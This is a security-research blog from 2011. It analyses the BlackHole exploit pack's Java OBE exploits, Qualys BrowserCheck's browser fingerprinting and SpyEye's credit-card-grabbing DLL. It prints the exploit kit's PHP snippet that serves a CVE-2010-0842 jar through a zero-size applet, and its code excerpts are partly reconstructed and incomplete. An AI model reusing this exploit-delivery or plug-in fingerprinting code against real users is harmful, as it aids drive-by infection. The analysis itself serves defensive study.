Monday, February 21, 2011

Java OBE + BlackHole - Dead Man Rising

The BlackHole exploit pack is showing a heavy increase in malware infections across the web. The interesting fact about BlackHole is its use of Java OBE (Open Business Engine) to spread exploits and successfully load the malicious executable on the victim machine.

What is OBE?
"OBE is a flexible, modular, standards-compliant Open Source Java workflow engine. It is fully J2EE compliant, and supports several J2EE application servers, operating systems and databases. It faithfully implements Workflow Management Coalition Open Standards (WfMC), to which it offers a variety of extensions and enhancements. OBE is equally suited to embedded or standalone deployment."

More details can be found here

However, BlackHole uses a fully functional Java OBE toolkit to exploit a plethora of systems. Our latest analysis shows that Java OBE holds the maximum rate of successfully exploiting targets. The BlackHole exploit pack shows this behaviour: the Java OBE toolkit is devastating victim machines at a more rapid pace than any other exploit.

The exploits served by Java OBE are CVE-2010-0840 and CVE-2010-0842.

As stated by the Zero Day Initiative: "Authentication is not required to exploit this vulnerability. The specific flaw exists within the code responsible for ensuring proper privileged execution of methods. If an untrusted method in an applet attempts to call a method that requires privileges, Java will walk the call stack and for each entry verify that the method called is defined within a class that has that privilege."

The BlackHole exploit pack uses the following PHP code to link to the exploit (angle brackets were stripped by extraction and are restored here):
<?php
include_once 'config.php';
echo '<Applet Code="ToolsDemo.class" archive="';
echo $config_url . '/exploits/Java-2010-0842.jar';
echo '" width="0" Height="1">';   // closing quote and bracket restored
// the tag wrapping the helper URL was lost in extraction; only the URL echo survives
echo $config_url . '/exploits/Java-2010-0842Helper.php';
echo '">';

The exploit is encoded with the PHP ionCube encoder; the loader stub at the top of the file reads as follows (statements broken out one per line for readability):

<?php //0035e
if(!extension_loaded('ionCube Loader')){
    $__oc=strtolower(substr(php_uname(),0,3));
    $__ln='/ioncube/ioncube_loader_'.$__oc.'_'.substr(phpversion(),0,3).(($__oc=='win')?'.dll':'.so');
    $__oid=$__id=realpath(ini_get('extension_dir'));
    // the statements that set $__here and $__rd were lost in extraction; the stub continues with:
    $__here.'/';
    $__i=strlen($__rd);
    while($__i--){if($__rd[$__i]=='/'){$__lp=substr($__rd,0,$__i).$__ln;if(file_exists($__oid.$__lp)){$__ln=$__lp;break;}}}
    @dl($__ln);
}else{die('The file '.__FILE__." is corrupted.\n");}
if(function_exists('_il_exec')){return _il_exec();}
echo('Site error: the file '.__FILE__.' requires the ionCube PHP Loader '.basename($__ln).' to be installed by the site administrator.');
exit(199);


This exploit can be found in the wild on the web. During our analysis, exploit-specific stats were checked for the infected domain hosting the BlackHole exploit pack. The comparative ratio is presented below

This scenario shows the ease of exploiting the Java open engine. Only the BlackHole exploit pack is analyzed here; what about other exploit packs? It seems that Java is becoming the preferred base for exploitation because of its platform-independent nature.

Saturday, February 19, 2011

BrowserCheck - Malware Driven Retrospective

Recently, we came across the new browser security tool released by Qualys, termed BrowserCheck. In general, this tool scrutinizes and verifies the state of plug-ins in the Mozilla browser. As stated in the InformationWeek article: "Less-than-current browser and plug-in versions can leave your browsing unnecessarily vulnerable to web-based attacks... and make latest-and-greatest-based web sites harder or impossible to use, but Qualys' free BrowserCheck can help."

Well, in general the tool is designed as a simple version-based signature tool. However, it uses a PHP-based version verifier script that runs on the server side. An XMLHttpRequest is used to send the browser information, which we term User Agent Based Fingerprinting (UABF).

Conversely, this technique is used in the wild by all classes of malware to detect the state of the browser (version, add-ons, plug-ins, etc.). Beyond that, malware is served based on the version found running. A similar plug-in detection script can be compiled using the navigator object as follows

Further, we also observed that the tool uses JavaScript and XMLHttpRequest together to gather information from the client machine. During testing, we ran a small check to see whether a Java applet is loaded on the system, in order to verify the tool's semantics. Generally, the Java plug-in version can be checked with a simple Java applet as follows

import java.applet.*;
import java.awt.*;

public class JavaVersionDisplayApplet extends Applet {
    private Label m_labVersionVendor;

    public JavaVersionDisplayApplet() { // constructor
        // java.version and java.vendor are system properties exposed to the applet
        m_labVersionVendor = new Label(" Java Version: " + System.getProperty("java.version") +
                                       " from " + System.getProperty("java.vendor"));
        add(m_labVersionVendor);
    }
}

The Java client-side environment is not triggered on the test machine, which clearly indicates that fingerprinting is done using simple tactics. While running the tool on one of our test-bed machines, we found that the data is transferred as

{"Platform":"Microsoft Windows Vista Home Premium Edition, 64-bit Service Pack 2","Browser":"Mozilla Firefox 3.6.13","AgentVer":"","SADllVer":"","InstanceId":"72904d0d-a58e-409d-afa3-922d1c8a71cd","ScanId":"5"},

"ScanResults":[{"Status":"Up To Date","ItemType":"Browser","ItemName":"Mozilla Firefox","FoundVer":"3.6.13","ProductVer":"3.6.13","RequiredVer":"",

{"Status":"Up To Date","ItemType":"Browser Extra","ItemName":"Adobe Flash Player","FoundVer":"","InstalledFile":"c:\\windows\\syswow64\\macromed\\flash\\npswf32.dll","ProductVer":"","RequiredVer":"",

{"Status":"Up To Date","ItemType":"Browser Extra","ItemName":"Adobe Reader","FoundVer":"","InstalledFile":"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\browser\\nppdf32.dll","ProductVer":"","RequiredVer":"",

{"Status":"Up To Date","ItemType":"Browser Extra","ItemName":"Java Runtime","FoundVer":"1.6.0_22","ProductVer":"1.6.0_22","RequiredVer":"1.6.0_24","RecommendedVer":"Latest Version of Java","AddonType":"Plugin","FixInfo":""},

{"Status":"Up To Date","ItemType":"Browser Extra","ItemName":"Microsoft Silverlight","FoundVer":"4.0.60129.0","InstalledFile":"c:\\program files (x86)\\microsoft silverlight\\4.0.60129.0\\npctrl.dll","ProductVer":"4.0.60129.0","RequiredVer":"4.0.60129.0",

{"Status":"NA","ItemType":"Browser Extra","ItemName":"Microsoft Windows Presentation Foundation","FoundVer":"3.5.30729.1","InstalledFile":"",

{"Status":"Up To Date","ItemType":"Browser Extra","ItemName":"Microsoft Windows Media Player","FoundVer":"11.0.6002.18311","InstalledFile":"C:\\Windows\\system32\\wmp.dll","ProductVer":"11.0.6002.18311",

This scan output shows in full how the tool works. The technique is not new, but it shows that signature-based version checks are still widely used.
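The plug-in check described earlier in this post (reading the navigator object) and the ScanResults records above, as an added example that is not BrowserCheck's script, this blog's own code, or any malware sample: a small JavaScript inventory that reads navigator.userAgent and navigator.plugins, extracts version strings, compares them with a table of minimum versions, and emits records in the same Status/ItemType/ItemName/FoundVer/RequiredVer/InstalledFile shape. The navigator object, the plug-in description strings, the browser minimum and the REQUIRED table are constructed for this illustration (only the Java RequiredVer 1.6.0_24 comes from the scan output above); in a browser the real navigator would be passed in instead.

```javascript
// Constructed stand-in for the browser's navigator object (Firefox exposes
// navigator.plugins entries with .name/.description/.filename). It exists only
// so the block runs offline under Node; in a browser pass `navigator` itself.
const fakeNavigator = {
  userAgent: "Mozilla/5.0 (Windows NT 6.0; WOW64; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13",
  plugins: [
    { name: "Java(TM) Platform SE 6 U22",
      description: "Next Generation Java Plug-in 1.6.0_22 for Mozilla browsers",
      filename: "npjp2.dll" },
    { name: "Shockwave Flash",
      description: "Shockwave Flash 10.1 r102",
      filename: "NPSWF32.dll" },
    { name: "Windows Presentation Foundation",
      description: "Windows Presentation Foundation plug-in for Mozilla browsers",
      filename: "NPWPF.dll" },
  ],
};

// Minimum versions the inventory compares against (constructed table; the Java
// value 1.6.0_24 is the RequiredVer seen in the scan output in this post).
const REQUIRED = [
  { match: /Java/i,  ItemName: "Java Runtime",       RequiredVer: "1.6.0_24" },
  { match: /Flash/i, ItemName: "Adobe Flash Player", RequiredVer: "10.1.102" },
  { match: /Presentation Foundation/i,
    ItemName: "Microsoft Windows Presentation Foundation", RequiredVer: "" },
];
const REQUIRED_BROWSER = "3.6.13"; // constructed minimum for Firefox

// Pull a dotted/underscored version out of free text; Flash's "10.1 r102" form
// is folded into "10.1.102" first. Returns "" when nothing version-like exists.
function extractVersion(text) {
  const m = text.replace(/\s*r(\d+)\b/, ".$1").match(/\d+(?:[._]\d+)+/);
  return m ? m[0] : "";
}

// Component-wise integer comparison ("1.6.0_22" < "1.6.0_24"); a missing
// component counts as 0, so "10.1" equals "10.1.0". Returns -1, 0 or 1.
function compareVersions(a, b) {
  const pa = a.split(/[._]/).map(Number), pb = b.split(/[._]/).map(Number);
  const n = Math.max(pa.length, pb.length);
  for (let i = 0; i < n; i++) {
    const d = (pa[i] || 0) - (pb[i] || 0);
    if (d !== 0) return d < 0 ? -1 : 1;
  }
  return 0;
}

// Status exactly as the scan output labels it; "NA" when either side is unknown.
function status(foundVer, requiredVer) {
  if (!foundVer || !requiredVer) return "NA";
  return compareVersions(foundVer, requiredVer) >= 0 ? "Up To Date" : "Out Of Date";
}

// The "Browser" record, derived from the user-agent string.
function browserItem(nav) {
  const m = /Firefox\/(\d+(?:\.\d+)+)/.exec(nav.userAgent);
  const found = m ? m[1] : "";
  return { Status: status(found, REQUIRED_BROWSER), ItemType: "Browser",
           ItemName: "Mozilla Firefox", FoundVer: found, RequiredVer: REQUIRED_BROWSER };
}

// One "Browser Extra" record per installed plug-in. The version comes purely
// from the strings the plug-in reports about itself, nothing else is inspected.
function inventory(nav) {
  return Array.from(nav.plugins).map((p) => {
    const rule = REQUIRED.find((r) => r.match.test(p.name)) ||
                 { ItemName: p.name, RequiredVer: "" };
    const found = extractVersion(p.description) || extractVersion(p.name);
    return { Status: status(found, rule.RequiredVer), ItemType: "Browser Extra",
             ItemName: rule.ItemName, FoundVer: found,
             RequiredVer: rule.RequiredVer, InstalledFile: p.filename };
  });
}

// Same envelope shape as the data the tool posts back to its server.
console.log(JSON.stringify(
  { ScanResults: [browserItem(fakeNavigator), ...inventory(fakeNavigator)] }, null, 1));
```

Everything the inventory knows comes from self-reported strings: the Java record is classified from the text "1.6.0_22" inside the plug-in description, and a plug-in that reports a current version string is reported Up To Date whatever its binary actually contains, which is the limit of version-based signature checks this post points at.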

The next question is how this tool reacts when a malicious plug-in (carrying up-to-date version information) is installed in the browser.

Monday, February 14, 2011

HITB Paper - Shared Hosting Infections

HITB issue 5 talks about our paper on "Shared Hosting Malware Infections". FETCH here.

Sunday, February 6, 2011

SpyEye CreditGrab.dll Module - Plugin Analysis

In our last post about the SpyEye backend collector, we discussed the data transfer mechanism in the SpyEye botnet framework. SpyEye uses creditgrab.dll to take care of the credit card data stolen from victim machines. Last time we talked about the source code analysis; to support that, we recently came across the dynamic link libraries for the different modules. In this post, we are going to talk about creditgrab.dll.

The DLL main function is designed as follows

In the first part, the Credit Grab Module (CGM) is designed to get the bot information with a guid reference. This bot guid is used to keep track of the infection occurring on the victim machine and the credit card information stolen from it. The code snippet presented below shows this

The function "TakeBotGuid" is used in conjunction with the CGM. In this function the bot guid is checked. The "repne scasb" instruction keeps scanning the string for the NULL terminator, decrementing the counter (dec ecx) as it goes. If the carry flag is zero (jnb short loc_1000167D), the function jumps to the address that points to the bot guid "unknown".

The gate collector function TakeGateToCollector is structured as follows

void TakeGateToCollector(LPVOID lpGateFunc);
typedef void (*GATETOCOLLECTOR)(IN PBYTE pbData, IN DWORD dwSize);

The next function that plays a critical role in hijacking the HTTP communication channel is Callback_OnBeforeLoadPage. The code snippet taken from this function is presented below

The function loads the bot guid, URI and data by calling the same subroutine, "sub_10001370", a string checking and terminating routine that validates the parameters passed to the SpyEye function.

The snippet above shows how strings are dissected. "strstr" and "strtok" are used together to find matching patterns and split the string on the "&" token. In this function they serve URL dissection and data collection from a raw source (i.e. information extraction from raw HTTP content). The XREF structure of the plugin module is traced below

So this post clearly shows how the SpyEye bot collects data, by analyzing a specific DLL sample.

We will be covering the analysis of other modules (some new ones) in upcoming posts.